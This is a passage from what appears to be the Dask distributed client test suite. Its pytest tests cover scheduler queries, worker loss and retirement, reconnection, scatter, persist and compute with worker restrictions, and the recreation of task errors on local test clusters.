assert isinstance(x[a.address], (list, tuple))
@gen_cluster(client=True)
async def test_get_foo(c, s, a, b):
futures = c.map(inc, range(10))
await wait(futures)
x = await c.scheduler.ncores()
assert x == s.nthreads
x = await c.scheduler.ncores(workers=[a.address])
assert x == {a.address: s.nthreads[a.address]}
x = await c.scheduler.has_what()
assert valmap(sorted, x) == valmap(sorted, s.has_what)
x = await c.scheduler.has_what(workers=[a.address])
assert valmap(sorted, x) == {a.address: sorted(s.has_what[a.address])}
x = await c.scheduler.nbytes(summary=False)
assert x == s.get_nbytes(summary=False)
x = await c.scheduler.nbytes(keys=[futures[0].key], summary=False)
assert x == {futures[0].key: s.tasks[futures[0].key].nbytes}
x = await c.scheduler.who_has()
assert valmap(sorted, x) == valmap(sorted, s.who_has)
x = await c.scheduler.who_has(keys=[futures[0].key])
assert valmap(sorted, x) == {futures[0].key: sorted(s.who_has[futures[0].key])}
def assert_dict_key_equal(expected, actual):
assert set(expected.keys()) == set(actual.keys())
for k in actual.keys():
ev = expected[k]
av = actual[k]
assert list(ev) == list(av)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 3)
async def test_get_foo_lost_keys(c, s, u, v, w):
x = c.submit(inc, 1, workers=[u.address])
y = await c.scatter(3, workers=[v.address])
await wait([x, y])
ua, va, wa = u.address, v.address, w.address
d = await c.scheduler.has_what()
assert_dict_key_equal(d, {ua: [x.key], va: [y.key], wa: []})
d = await c.scheduler.has_what(workers=[ua, va])
assert_dict_key_equal(d, {ua: [x.key], va: [y.key]})
d = await c.scheduler.who_has()
assert_dict_key_equal(d, {x.key: [ua], y.key: [va]})
d = await c.scheduler.who_has(keys=[x.key, y.key])
assert_dict_key_equal(d, {x.key: [ua], y.key: [va]})
await u.close()
await v.close()
d = await c.scheduler.has_what()
assert_dict_key_equal(d, {wa: []})
d = await c.scheduler.has_what(workers=[ua, va])
assert_dict_key_equal(d, {ua: [], va: []})
# The scattered key cannot be recomputed so it is forgotten
d = await c.scheduler.who_has()
assert_dict_key_equal(d, {x.key: []})
# ... but when passed explicitly, it is included in the result
d = await c.scheduler.who_has(keys=[x.key, y.key])
assert_dict_key_equal(d, {x.key: [], y.key: []})
@pytest.mark.slow
@gen_cluster(
client=True, Worker=Nanny, clean_kwargs={"threads": False, "processes": False}
)
async def test_bad_tasks_fail(c, s, a, b):
f = c.submit(sys.exit, 0)
with captured_logger(logging.getLogger("distributed.scheduler")) as logger:
with pytest.raises(KilledWorker) as info:
await f
text = logger.getvalue()
assert f.key in text
assert info.value.last_worker.nanny in {a.address, b.address}
await asyncio.gather(a.close(), b.close())
def test_get_processing_sync(c, s, a, b):
processing = c.processing()
assert not any(v for v in processing.values())
futures = c.map(
slowinc, range(10), delay=0.1, workers=[a["address"]], allow_other_workers=False
)
sleep(0.2)
aa = a["address"]
bb = b["address"]
processing = c.processing()
assert set(c.processing(aa)) == {aa}
assert set(c.processing([aa])) == {aa}
c.cancel(futures)
def test_close_idempotent(c):
c.close()
c.close()
c.close()
@nodebug
def test_get_returns_early(c):
start = time()
with suppress(RuntimeError):
result = c.get({"x": (throws, 1), "y": (sleep, 1)}, ["x", "y"])
assert time() < start + 0.5
# Futures should be released and forgotten
wait_for(lambda: not c.futures, timeout=0.1)
wait_for(lambda: not any(c.processing().values()), timeout=3)
x = c.submit(inc, 1)
x.result()
with suppress(RuntimeError):
result = c.get({"x": (throws, 1), x.key: (inc, 1)}, ["x", x.key])
assert x.key in c.futures
@pytest.mark.slow
@gen_cluster(Worker=Nanny, client=True, timeout=60)
async def test_Client_clears_references_after_restart(c, s, a, b):
x = c.submit(inc, 1)
assert x.key in c.refcount
await c.restart()
assert x.key not in c.refcount
key = x.key
del x
import gc
gc.collect()
await asyncio.sleep(0)
assert key not in c.refcount
@gen_cluster(Worker=Nanny, client=True)
async def test_restart_timeout_is_logged(c, s, a, b):
with captured_logger(logging.getLogger("distributed.client")) as logger:
await c.restart(timeout="0.5s")
text = logger.getvalue()
assert "Restart timed out after 0.50 seconds" in text
def test_get_stops_work_after_error(c):
with pytest.raises(RuntimeError):
c.get({"x": (throws, 1), "y": (sleep, 1.5)}, ["x", "y"])
start = time()
while any(c.processing().values()):
sleep(0.01)
assert time() < start + 0.5
def test_as_completed_list(c):
seq = c.map(inc, range(5))
seq2 = list(as_completed(seq))
assert set(c.gather(seq2)) == {1, 2, 3, 4, 5}
def test_as_completed_results(c):
seq = c.map(inc, range(5))
seq2 = list(as_completed(seq, with_results=True))
assert set(pluck(1, seq2)) == {1, 2, 3, 4, 5}
assert set(pluck(0, seq2)) == set(seq)
@pytest.mark.parametrize("with_results", [True, False])
def test_as_completed_batches(c, with_results):
n = 50
futures = c.map(slowinc, range(n), delay=0.01)
out = []
for batch in as_completed(futures, with_results=with_results).batches():
assert isinstance(batch, (tuple, list))
sleep(0.05)
out.extend(batch)
assert len(out) == n
if with_results:
assert set(pluck(1, out)) == set(range(1, n + 1))
else:
assert set(out) == set(futures)
def test_as_completed_next_batch(c):
futures = c.map(slowinc, range(2), delay=0.1)
ac = as_completed(futures)
assert not ac.is_empty()
assert ac.next_batch(block=False) == []
assert set(ac.next_batch(block=True)).issubset(futures)
while not ac.is_empty():
assert set(ac.next_batch(block=True)).issubset(futures)
assert ac.is_empty()
assert not ac.has_ready()
@gen_cluster(nthreads=[])
async def test_status(s):
c = await Client(s.address, asynchronous=True)
assert c.status == "running"
x = c.submit(inc, 1)
await c.close()
assert c.status == "closed"
@gen_cluster(client=True)
async def test_async_whowhat(c, s, a, b):
[x] = await c.scatter([1], workers=a.address)
who_has = await c.who_has()
has_what = await c.has_what()
assert type(who_has) is WhoHas
assert type(has_what) is HasWhat
assert who_has == {x.key: (a.address,)}
assert has_what == {a.address: (x.key,), b.address: ()}
def test_client_repr_html(c):
x = c.submit(inc, 1)
who_has = c.who_has()
has_what = c.has_what()
assert type(who_has) is WhoHas
assert type(has_what) is HasWhat
@gen_cluster(client=True)
async def test_persist_optimize_graph(c, s, a, b):
i = 10
for method in [c.persist, c.compute]:
b = db.range(i, npartitions=2)
i += 1
b2 = b.map(inc)
b3 = b2.map(inc)
b4 = method(b3, optimize_graph=False)
await wait(b4)
assert set(map(stringify, b3.__dask_keys__())).issubset(s.tasks)
b = db.range(i, npartitions=2)
i += 1
b2 = b.map(inc)
b3 = b2.map(inc)
b4 = method(b3, optimize_graph=True)
await wait(b4)
assert not any(stringify(k) in s.tasks for k in b2.__dask_keys__())
@gen_cluster(client=True, nthreads=[])
async def test_scatter_raises_if_no_workers(c, s):
with pytest.raises(TimeoutError):
await c.scatter(1, timeout=0.5)
@pytest.mark.slow
def test_reconnect(loop):
w = Worker("127.0.0.1", 9393, loop=loop)
loop.add_callback(w.start)
scheduler_cli = [
"dask-scheduler",
"--host",
"127.0.0.1",
"--port",
"9393",
"--no-dashboard",
]
with popen(scheduler_cli):
c = Client("127.0.0.1:9393", loop=loop)
c.wait_for_workers(1, timeout=10)
x = c.submit(inc, 1)
assert x.result(timeout=10) == 2
start = time()
while c.status != "connecting":
assert time() < start + 10
sleep(0.01)
assert x.status == "cancelled"
with pytest.raises(CancelledError):
x.result(timeout=10)
with popen(scheduler_cli):
start = time()
while c.status != "running":
sleep(0.1)
assert time() < start + 10
start = time()
while len(c.nthreads()) != 1:
sleep(0.05)
assert time() < start + 10
x = c.submit(inc, 1)
assert x.result(timeout=10) == 2
start = time()
while True:
assert time() < start + 10
try:
x.result(timeout=10)
assert False
except CommClosedError:
continue
except CancelledError:
break
sync(loop, w.close, timeout=1)
c.close()
@gen_cluster(client=True, nthreads=[], client_kwargs={"timeout": 0.5})
async def test_reconnect_timeout(c, s):
with captured_logger(logging.getLogger("distributed.client")) as logger:
await s.close()
while c.status != "closed":
await c._update_scheduler_info()
await asyncio.sleep(0.05)
text = logger.getvalue()
assert "Failed to reconnect" in text
@pytest.mark.avoid_ci(reason="hangs on github actions ubuntu-latest CI")
@pytest.mark.slow
@pytest.mark.skipif(WINDOWS, reason="num_fds not supported on windows")
@pytest.mark.parametrize("worker,count,repeat", [(Worker, 100, 5), (Nanny, 10, 20)])
def test_open_close_many_workers(loop, worker, count, repeat):
proc = psutil.Process()
with cluster(nworkers=0, active_rpc_timeout=2) as (s, _):
gc.collect()
before = proc.num_fds()
done = Semaphore(0)
running = weakref.WeakKeyDictionary()
workers = set()
status = True
async def start_worker(sleep, duration, repeat=1):
for i in range(repeat):
await asyncio.sleep(sleep)
if not status:
return
w = worker(s["address"], loop=loop)
running[w] = None
await w
workers.add(w)
addr = w.worker_address
running[w] = addr
await asyncio.sleep(duration)
await w.close()
del w
await asyncio.sleep(0)
done.release()
for i in range(count):
loop.add_callback(
start_worker, random.random() / 5, random.random() / 5, repeat=repeat
)
with Client(s["address"], loop=loop) as c:
sleep(1)
for i in range(count):
done.acquire(timeout=5)
gc.collect()
if not running:
break
start = time()
while c.nthreads():
sleep(0.2)
assert time() < start + 10
while len(workers) < count * repeat:
sleep(0.2)
status = False
[c.sync(w.close) for w in list(workers)]
for w in workers:
assert w.status == Status.closed
start = time()
while proc.num_fds() > before:
print("fds:", before, proc.num_fds())
sleep(0.1)
if time() > start + 10:
if worker == Worker: # this is an esoteric case
print("File descriptors did not clean up")
break
else:
raise ValueError("File descriptors did not clean up")
@gen_cluster()
async def test_idempotence(s, a, b):
c = await Client(s.address, asynchronous=True)
f = await Client(s.address, asynchronous=True)
# Submit
x = c.submit(inc, 1)
await x
log = list(s.transition_log)
len_single_submit = len(log) # see last assert
y = f.submit(inc, 1)
assert x.key == y.key
await y
await asyncio.sleep(0.1)
log2 = list(s.transition_log)
assert log == log2
# Error
a = c.submit(div, 1, 0)
await wait(a)
assert a.status == "error"
log = list(s.transition_log)
b = f.submit(div, 1, 0)
assert a.key == b.key
await wait(b)
await asyncio.sleep(0.1)
log2 = list(s.transition_log)
assert log == log2
s.transition_log.clear()
# Simultaneous Submit
d = c.submit(inc, 2)
e = c.submit(inc, 2)
await wait([d, e])
assert len(s.transition_log) == len_single_submit
await c.close()
await f.close()
def test_scheduler_info(c):
info = c.scheduler_info()
assert isinstance(info, dict)
assert len(info["workers"]) == 2
assert isinstance(info["started"], float)
def test_write_scheduler_file(c):
info = c.scheduler_info()
with tmpfile("json") as scheduler_file:
c.write_scheduler_file(scheduler_file)
with Client(scheduler_file=scheduler_file) as c2:
info2 = c2.scheduler_info()
assert c.scheduler.address == c2.scheduler.address
# test that a ValueError is raised if the scheduler_file
# attribute is already set
with pytest.raises(ValueError):
c.write_scheduler_file(scheduler_file)
def test_get_versions(c):
requests = pytest.importorskip("requests")
v = c.get_versions()
assert v["scheduler"] is not None
assert v["client"] is not None
assert len(v["workers"]) == 2
for k, v in v["workers"].items():
assert v is not None
c.get_versions(check=True)
# smoke test for versions
# that this does not raise
v = c.get_versions(packages=["requests"])
assert v["client"]["packages"]["requests"] == requests.__version__
@gen_cluster(client=True)
async def test_async_get_versions(c, s, a, b):
await c.get_versions(check=True)
def test_threaded_get_within_distributed(c):
import dask.multiprocessing
for get in [dask.local.get_sync, dask.multiprocessing.get, dask.threaded.get]:
def f():
return get({"x": (lambda: 1,)}, "x")
future = c.submit(f)
assert future.result() == 1
@gen_cluster(client=True)
async def test_lose_scattered_data(c, s, a, b):
[x] = await c.scatter([1], workers=a.address)
await a.close()
await asyncio.sleep(0.1)
assert x.status == "cancelled"
assert x.key not in s.tasks
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 3)
async def test_partially_lose_scattered_data(e, s, a, b, c):
x = await e.scatter(1, workers=a.address)
await e.replicate(x, n=2)
await a.close()
await asyncio.sleep(0.1)
assert x.status == "finished"
assert s.get_task_status(keys=[x.key]) == {x.key: "memory"}
@gen_cluster(client=True)
async def test_scatter_compute_lose(c, s, a, b):
[x] = await c.scatter([[1, 2, 3, 4]], workers=a.address)
y = c.submit(inc, 1, workers=b.address)
z = c.submit(slowadd, x, y, delay=0.2)
await asyncio.sleep(0.1)
await a.close()
with pytest.raises(CancelledError):
await wait(z)
assert x.status == "cancelled"
assert y.status == "finished"
assert z.status == "cancelled"
@gen_cluster(client=True)
async def test_scatter_compute_store_lose(c, s, a, b):
"""
Create irreplaceable data on one machine,
cause a dependent computation to occur on another and complete
Kill the machine with the irreplaceable data. What happens to the complete
result? How about after it GCs and tries to come back?
"""
x = await c.scatter(1, workers=a.address)
xx = c.submit(inc, x, workers=a.address)
y = c.submit(inc, 1)
z = c.submit(slowadd, xx, y, delay=0.2, workers=b.address)
await wait(z)
await a.close()
while x.status == "finished":
await asyncio.sleep(0.01)
# assert xx.status == 'finished'
assert y.status == "finished"
assert z.status == "finished"
zz = c.submit(inc, z)
await wait(zz)
zkey = z.key
del z
while s.get_task_status(keys=[zkey]) != {zkey: "released"}:
await asyncio.sleep(0.01)
xxkey = xx.key
del xx
while x.key in s.tasks and zkey not in s.tasks and xxkey not in s.tasks:
await asyncio.sleep(0.01)
@gen_cluster(client=True)
async def test_scatter_compute_store_lose_processing(c, s, a, b):
"""
Create irreplaceable data on one machine,
cause a dependent computation to occur on another and complete
Kill the machine with the irreplaceable data. What happens to the complete
result? How about after it GCs and tries to come back?
"""
[x] = await c.scatter([1], workers=a.address)
y = c.submit(slowinc, x, delay=0.2)
z = c.submit(inc, y)
await asyncio.sleep(0.1)
await a.close()
while x.status == "finished":
await asyncio.sleep(0.01)
assert y.status == "cancelled"
assert z.status == "cancelled"
@gen_cluster()
async def test_serialize_future(s, a, b):
c1 = await Client(s.address, asynchronous=True)
c2 = await Client(s.address, asynchronous=True)
future = c1.submit(lambda: 1)
result = await future
for ci in (c1, c2):
for ctxman in ci.as_current, lambda: temp_default_client(ci):
with ctxman():
future2 = pickle.loads(pickle.dumps(future))
assert future2.client is ci
assert stringify(future2.key) in ci.futures
result2 = await future2
assert result == result2
await c1.close()
await c2.close()
@gen_cluster()
async def test_temp_default_client(s, a, b):
c1 = await Client(s.address, asynchronous=True)
c2 = await Client(s.address, asynchronous=True)
with temp_default_client(c1):
assert default_client() is c1
assert default_client(c2) is c2
with temp_default_client(c2):
assert default_client() is c2
assert default_client(c1) is c1
await c1.close()
await c2.close()
@gen_cluster(client=True)
async def test_as_current(c, s, a, b):
c1 = await Client(s.address, asynchronous=True)
c2 = await Client(s.address, asynchronous=True)
with temp_default_client(c):
assert Client.current() is c
with pytest.raises(ValueError):
Client.current(allow_global=False)
with c1.as_current():
assert Client.current() is c1
assert Client.current(allow_global=True) is c1
with c2.as_current():
assert Client.current() is c2
assert Client.current(allow_global=True) is c2
await c1.close()
await c2.close()
def test_as_current_is_thread_local(s):
l1 = threading.Lock()
l2 = threading.Lock()
l3 = threading.Lock()
l4 = threading.Lock()
l1.acquire()
l2.acquire()
l3.acquire()
l4.acquire()
def run1():
with Client(s["address"]) as c:
with c.as_current():
l1.acquire()
l2.release()
try:
# This line runs only when both run1 and run2 are inside the
# context manager
assert Client.current(allow_global=False) is c
finally:
l3.acquire()
l4.release()
def run2():
with Client(s["address"]) as c:
with c.as_current():
l1.release()
l2.acquire()
try:
# This line runs only when both run1 and run2 are inside the
# context manager
assert Client.current(allow_global=False) is c
finally:
l3.release()
l4.acquire()
t1 = threading.Thread(target=run1)
t2 = threading.Thread(target=run2)
t1.start()
t2.start()
t1.join()
t2.join()
@gen_cluster()
async def test_as_current_is_task_local(s, a, b):
l1 = asyncio.Lock()
l2 = asyncio.Lock()
l3 = asyncio.Lock()
l4 = asyncio.Lock()
await l1.acquire()
await l2.acquire()
await l3.acquire()
await l4.acquire()
async def run1():
async with Client(s.address, asynchronous=True) as c:
with c.as_current():
await l1.acquire()
l2.release()
try:
# This line runs only when both run1 and run2 are inside the
# context manager
assert Client.current(allow_global=False) is c
finally:
await l3.acquire()
l4.release()
async def run2():
async with Client(s.address, asynchronous=True) as c:
with c.as_current():
l1.release()
await l2.acquire()
try:
# This line runs only when both run1 and run2 are inside the
# context manager
assert Client.current(allow_global=False) is c
finally:
l3.release()
await l4.acquire()
await asyncio.gather(run1(), run2())
@nodebug # test timing is fragile
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
async def test_persist_workers_annotate(e, s, a, b, c):
with dask.annotate(workers=a.address, allow_other_workers=False):
L1 = [delayed(inc)(i) for i in range(4)]
with dask.annotate(workers=b.address, allow_other_workers=False):
total = delayed(sum)(L1)
with dask.annotate(workers=c.address, allow_other_workers=True):
L2 = [delayed(add)(i, total) for i in L1]
with dask.annotate(workers=b.address, allow_other_workers=True):
total2 = delayed(sum)(L2)
# TODO: once annotations are faithfully forwarded upon graph optimization,
# we shouldn't need to disable that here.
out = e.persist(L1 + L2 + [total, total2], optimize_graph=False)
await wait(out)
assert all(v.key in a.data for v in L1)
assert total.key in b.data
assert s.loose_restrictions == {total2.key} | {v.key for v in L2}
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
async def test_persist_workers_annotate2(e, s, a, b, c):
def key_to_worker(key):
return a.address
L1 = [delayed(inc)(i) for i in range(4)]
for x in L1:
assert all(layer.annotations is None for layer in x.dask.layers.values())
with dask.annotate(workers=key_to_worker):
out = e.persist(L1, optimize_graph=False)
await wait(out)
for x in L1:
assert all(layer.annotations is None for layer in x.dask.layers.values())
for v in L1:
assert s.worker_restrictions[v.key] == {a.address}
@nodebug # test timing is fragile
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
async def test_persist_workers(e, s, a, b, c):
L1 = [delayed(inc)(i) for i in range(4)]
total = delayed(sum)(L1)
L2 = [delayed(add)(i, total) for i in L1]
total2 = delayed(sum)(L2)
out = e.persist(
L1 + L2 + [total, total2],
workers=[a.address, b.address],
allow_other_workers=True,
)
await wait(out)
for v in L1 + L2 + [total, total2]:
assert s.worker_restrictions[v.key] == {a.address, b.address}
assert not any(c.address in r for r in s.worker_restrictions)
assert s.loose_restrictions == {total.key, total2.key} | {v.key for v in L1 + L2}
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
async def test_compute_workers_annotate(e, s, a, b, c):
with dask.annotate(workers=a.address, allow_other_workers=True):
L1 = [delayed(inc)(i) for i in range(4)]
with dask.annotate(workers=b.address, allow_other_workers=True):
total = delayed(sum)(L1)
with dask.annotate(workers=[c.address]):
L2 = [delayed(add)(i, total) for i in L1]
# TODO: once annotations are faithfully forwarded upon graph optimization,
# we shouldn't need to disable that here.
out = e.compute(L1 + L2 + [total], optimize_graph=False)
await wait(out)
for v in L1:
assert s.worker_restrictions[v.key] == {a.address}
for v in L2:
assert s.worker_restrictions[v.key] == {c.address}
assert s.worker_restrictions[total.key] == {b.address}
assert s.loose_restrictions == {total.key} | {v.key for v in L1}
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
async def test_compute_workers(e, s, a, b, c):
L1 = [delayed(inc)(i) for i in range(4)]
total = delayed(sum)(L1)
L2 = [delayed(add)(i, total) for i in L1]
out = e.compute(
L1 + L2 + [total],
workers=[a.address, b.address],
allow_other_workers=True,
)
await wait(out)
for v in L1 + L2 + [total]:
assert s.worker_restrictions[v.key] == {a.address, b.address}
assert not any(c.address in r for r in s.worker_restrictions)
assert s.loose_restrictions == {total.key} | {v.key for v in L1 + L2}
@gen_cluster(client=True)
async def test_compute_nested_containers(c, s, a, b):
da = pytest.importorskip("dask.array")
np = pytest.importorskip("numpy")
x = da.ones(10, chunks=(5,)) + 1
future = c.compute({"x": [x], "y": 123})
result = await future
assert isinstance(result, dict)
assert (result["x"][0] == np.ones(10) + 1).all()
assert result["y"] == 123
@gen_cluster(client=True)
async def test_scatter_type(c, s, a, b):
[future] = await c.scatter([1])
assert future.type == int
d = await c.scatter({"x": 1.0})
assert d["x"].type == float
@gen_cluster(client=True)
async def test_retire_workers_2(c, s, a, b):
[x] = await c.scatter([1], workers=a.address)
await s.retire_workers(workers=[a.address])
assert b.data == {x.key: 1}
assert s.who_has == {x.key: {b.address}}
assert s.has_what == {b.address: {x.key}}
assert a.address not in s.workers
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_retire_many_workers(c, s, *workers):
futures = await c.scatter(list(range(100)))
await s.retire_workers(workers=[w.address for w in workers[:7]])
results = await c.gather(futures)
assert results == list(range(100))
while len(s.workers) != 3:
await asyncio.sleep(0.01)
assert len(s.has_what) == len(s.nthreads) == 3
assert all(future.done() for future in futures)
assert all(s.tasks[future.key].state == "memory" for future in futures)
for w, keys in s.has_what.items():
assert 15 < len(keys) < 50
@gen_cluster(
client=True,
nthreads=[("127.0.0.1", 3)] * 2,
config={"distributed.scheduler.default-task-durations": {"f": "10ms"}},
)
async def test_weight_occupancy_against_data_movement(c, s, a, b):
s.extensions["stealing"]._pc.callback_time = 1000000
def f(x, y=0, z=0):
sleep(0.01)
return x
y = await c.scatter([[1, 2, 3, 4]], workers=[a.address])
z = await c.scatter([1], workers=[b.address])
futures = c.map(f, [1, 2, 3, 4], y=y, z=z)
await wait(futures)
assert sum(f.key in a.data for f in futures) >= 2
assert sum(f.key in b.data for f in futures) >= 1
@gen_cluster(
client=True,
nthreads=[("127.0.0.1", 1), ("127.0.0.1", 10)],
config={"distributed.scheduler.default-task-durations": {"f": "10ms"}},
)
async def test_distribute_tasks_by_nthreads(c, s, a, b):
s.extensions["stealing"]._pc.callback_time = 1000000
def f(x, y=0):
sleep(0.01)
return x
y = await c.scatter([1], broadcast=True)
futures = c.map(f, range(20), y=y)
await wait(futures)
assert len(b.data) > 2 * len(a.data)
@gen_cluster(client=True, clean_kwargs={"threads": False})
async def test_add_done_callback(c, s, a, b):
S = set()
def f(future):
future.add_done_callback(g)
def g(future):
S.add((future.key, future.status))
u = c.submit(inc, 1, key="u")
v = c.submit(throws, "hello", key="v")
w = c.submit(slowinc, 2, delay=0.3, key="w")
x = c.submit(inc, 3, key="x")
u.add_done_callback(f)
v.add_done_callback(f)
w.add_done_callback(f)
await wait((u, v, w, x))
x.add_done_callback(f)
while len(S) < 4:
await asyncio.sleep(0.01)
assert S == {(f.key, f.status) for f in (u, v, w, x)}
@gen_cluster(client=True)
async def test_normalize_collection(c, s, a, b):
x = delayed(inc)(1)
y = delayed(inc)(x)
z = delayed(inc)(y)
yy = c.persist(y)
zz = c.normalize_collection(z)
assert len(z.dask) == len(y.dask) + 1
assert isinstance(zz.dask[y.key], Future)
assert len(zz.dask) < len(z.dask)
@gen_cluster(client=True)
async def test_normalize_collection_dask_array(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones(10, chunks=(5,))
y = x + 1
yy = c.persist(y)
z = y.sum()
zdsk = dict(z.dask)
zz = c.normalize_collection(z)
assert z.dask == zdsk # do not mutate input
assert len(z.dask) > len(zz.dask)
assert any(isinstance(v, Future) for v in zz.dask.values())
for k, v in yy.dask.items():
assert zz.dask[k].key == v.key
result1 = await c.compute(z)
result2 = await c.compute(zz)
assert result1 == result2
@pytest.mark.slow
def test_normalize_collection_with_released_futures(c):
da = pytest.importorskip("dask.array")
x = da.arange(2 ** 20, chunks=2 ** 10)
y = x.persist()
wait(y)
sol = y.sum().compute()
# Start releasing futures
del y
# Try to reuse futures. Previously this was a race condition,
# and the call to `.compute()` would error out due to missing
# futures on the scheduler at compute time.
normalized = c.normalize_collection(x)
res = normalized.sum().compute()
assert res == sol
@pytest.mark.xfail(reason="https://github.com/dask/distributed/issues/4404")
@gen_cluster(client=True)
async def test_auto_normalize_collection(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones(10, chunks=5)
assert len(x.dask) == 2
with dask.config.set(optimizations=[c._optimize_insert_futures]):
y = x.map_blocks(slowinc, delay=1, dtype=x.dtype)
yy = c.persist(y)
await wait(yy)
start = time()
future = c.compute(y.sum())
await future
end = time()
assert end - start < 1
start = time()
z = c.persist(y + 1)
await wait(z)
end = time()
assert end - start < 1
@pytest.mark.xfail(reason="https://github.com/dask/distributed/issues/4404")
def test_auto_normalize_collection_sync(c):
da = pytest.importorskip("dask.array")
x = da.ones(10, chunks=5)
y = x.map_blocks(slowinc, delay=1, dtype=x.dtype)
yy = c.persist(y)
wait(yy)
with dask.config.set(optimizations=[c._optimize_insert_futures]):
start = time()
y.sum().compute()
end = time()
assert end - start < 1
def assert_no_data_loss(scheduler):
for key, start, finish, recommendations, _ in scheduler.transition_log:
if start == "memory" and finish == "released":
for k, v in recommendations.items():
assert not (k == key and v == "waiting")
@gen_cluster(client=True)
async def test_interleave_computations(c, s, a, b):
import distributed
distributed.g = s
xs = [delayed(slowinc)(i, delay=0.02) for i in range(30)]
ys = [delayed(slowdec)(x, delay=0.02) for x in xs]
zs = [delayed(slowadd)(x, y, delay=0.02) for x, y in zip(xs, ys)]
total = delayed(sum)(zs)
future = c.compute(total)
done = ("memory", "released")
await asyncio.sleep(0.1)
x_keys = [x.key for x in xs]
y_keys = [y.key for y in ys]
z_keys = [z.key for z in zs]
while not s.tasks or any(w.processing for w in s.workers.values()):
await asyncio.sleep(0.05)
x_done = sum(state in done for state in s.get_task_status(keys=x_keys).values())
y_done = sum(state in done for state in s.get_task_status(keys=y_keys).values())
z_done = sum(state in done for state in s.get_task_status(keys=z_keys).values())
assert x_done >= y_done >= z_done
assert x_done < y_done + 10
assert y_done < z_done + 10
assert_no_data_loss(s)
@pytest.mark.skip(reason="Now prefer first-in-first-out")
@gen_cluster(client=True)
async def test_interleave_computations_map(c, s, a, b):
xs = c.map(slowinc, range(30), delay=0.02)
ys = c.map(slowdec, xs, delay=0.02)
zs = c.map(slowadd, xs, ys, delay=0.02)
done = ("memory", "released")
x_keys = [x.key for x in xs]
y_keys = [y.key for y in ys]
z_keys = [z.key for z in zs]
while not s.tasks or any(w.processing for w in s.workers.values()):
await asyncio.sleep(0.05)
x_done = sum(state in done for state in s.get_task_status(keys=x_keys).values())
y_done = sum(state in done for state in s.get_task_status(keys=y_keys).values())
z_done = sum(state in done for state in s.get_task_status(keys=z_keys).values())
assert x_done >= y_done >= z_done
assert x_done < y_done + 10
assert y_done < z_done + 10
@gen_cluster(client=True)
async def test_scatter_dict_workers(c, s, a, b):
await c.scatter({"a": 10}, workers=[a.address, b.address])
assert "a" in a.data or "a" in b.data
@pytest.mark.slow
@gen_test()
async def test_client_timeout():
"""`await Client(...)` keeps retrying for 10 seconds if it can't find the Scheduler
straight away
"""
c = Client("127.0.0.1:57484", asynchronous=True)
client_start_fut = asyncio.ensure_future(c)
await asyncio.sleep(4)
async with Scheduler(port=57484, dashboard_address=":0"):
await client_start_fut
assert await c.run_on_scheduler(lambda: 123) == 123
await c.close()
@gen_cluster(client=True)
async def test_submit_list_kwargs(c, s, a, b):
futures = await c.scatter([1, 2, 3])
def f(L=None):
return sum(L)
future = c.submit(f, L=futures)
result = await future
assert result == 1 + 2 + 3
@gen_cluster(client=True)
async def test_map_list_kwargs(c, s, a, b):
futures = await c.scatter([1, 2, 3])
def f(i, L=None):
return i + sum(L)
futures = c.map(f, range(10), L=futures)
results = await c.gather(futures)
assert results == [i + 6 for i in range(10)]
@gen_cluster(client=True)
async def test_dont_clear_waiting_data(c, s, a, b):
x = await c.scatter(1)
y = c.submit(slowinc, x, delay=0.5)
while y.key not in s.tasks:
await asyncio.sleep(0.01)
key = x.key
del x
for i in range(5):
assert s.waiting_data[key]
await asyncio.sleep(0)
@gen_cluster(client=True)
async def test_recreate_error_delayed(c, s, a, b):
x0 = delayed(dec)(2)
y0 = delayed(dec)(1)
x = delayed(div)(1, x0)
y = delayed(div)(1, y0)
tot = delayed(sum)(x, y)
f = c.compute(tot)
assert f.status == "pending"
error_f = await c._get_errored_future(f)
function, args, kwargs = await c._get_components_from_future(error_f)
assert f.status == "error"
assert function.__name__ == "div"
assert args == (1, 0)
with pytest.raises(ZeroDivisionError):
function(*args, **kwargs)
@gen_cluster(client=True)
async def test_recreate_error_futures(c, s, a, b):
x0 = c.submit(dec, 2)
y0 = c.submit(dec, 1)
x = c.submit(div, 1, x0)
y = c.submit(div, 1, y0)
tot = c.submit(sum, x, y)
f = c.compute(tot)
assert f.status == "pending"
error_f = await c._get_errored_future(f)
function, args, kwargs = await c._get_components_from_future(error_f)
assert f.status == "error"
assert function.__name__ == "div"
assert args == (1, 0)
with pytest.raises(ZeroDivisionError):
function(*args, **kwargs)
@gen_cluster(client=True)
async def test_recreate_error_collection(c, s, a, b):
b = db.range(10, npartitions=4)
b = b.map(lambda x: 1 / x)
b = b.persist()
f = c.compute(b)
error_f = await c._get_errored_future(f)
function, args, kwargs = await c._get_components_from_future(error_f)
with pytest.raises(ZeroDivisionError):
function(*args, **kwargs)
dd = pytest.importorskip("dask.dataframe")
import pandas as pd
df = dd.from_pandas(pd.DataFrame({"a": [0, 1, 2, 3, 4]}), chunksize=2)
def make_err(x):
# because pandas would happily work with NaN
if x == 0:
raise ValueError
return x
df2 = df.a.map(make_err)
f = c.compute(df2)
error_f = await c._get_errored_future(f)
function, args, kwargs = await c._get_components_from_future(error_f)
with pytest.raises(ValueError):
function(*args, **kwargs)
# with persist
df3 = c.persist(df2)
error_f = await c._get_errored_future(df3)
function, args, kwargs = await c._get_components_from_future(error_f)
with pytest.raises(ValueError):
function(*args, **kwargs)
@gen_cluster(client=True)
async def test_recreate_error_array(c, s, a, b):
da = pytest.importorskip("dask.array")
pytest.importorskip("scipy")
z = (da.linalg.inv(da.zeros((10, 10), chunks=10)) + 1).sum()
zz = z.persist()
error_f = await c._get_errored_future(zz)
function, args, kwargs = await c._get_components_from_future(error_f)
assert "0.,0.,0." in str(args).replace(" ", "") # args contain actual arrays
def test_recreate_error_sync(c):
x0 = c.submit(dec, 2)
y0 = c.submit(dec, 1)
x = c.submit(div, 1, x0)
y = c.submit(div, 1, y0)
tot = c.submit(sum, x, y)
f = c.compute(tot)
with pytest.raises(ZeroDivisionError):
